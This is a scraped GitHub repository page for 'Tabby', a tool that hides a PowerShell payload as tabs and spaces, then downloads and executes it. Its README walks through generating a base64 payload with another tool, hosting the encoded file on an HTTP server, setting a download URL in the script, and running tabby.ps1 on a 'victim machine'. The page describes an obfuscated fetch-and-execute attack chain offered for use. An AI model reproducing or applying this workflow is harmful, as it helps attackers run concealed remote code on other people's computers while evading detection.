1r0dm480 / Tabby

Tool that converts a payload into tabs and spaces and executes

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Tabby

Tool that converts a payload into tabs and spaces and executes

Usage

Generate the Payload:

  1. Launch PowerJoker(https://github.com/Adkali/PowerJoker) and copy the base64 output.

  2. Launch tabme.py using: python3 tabme.py

Preparing the Payload

  1. Paste the base64 encoding in tabme.py

  2. Specify the outfile i.e tabby.txt

Tabby's Payload Preview

  1. Add your http server to the powershell script: $tabsSpacesURL = "http://192.168.x.x/tabby.txt"

Stage your Http server

python3 -m http.server 80

Execute ps1 file on victim machine

.\tabby.ps1

About

Tool that converts a payload into tabs and spaces and executes

License:MIT License


Languages

Language:Python 59.3%Language:PowerShell 40.7%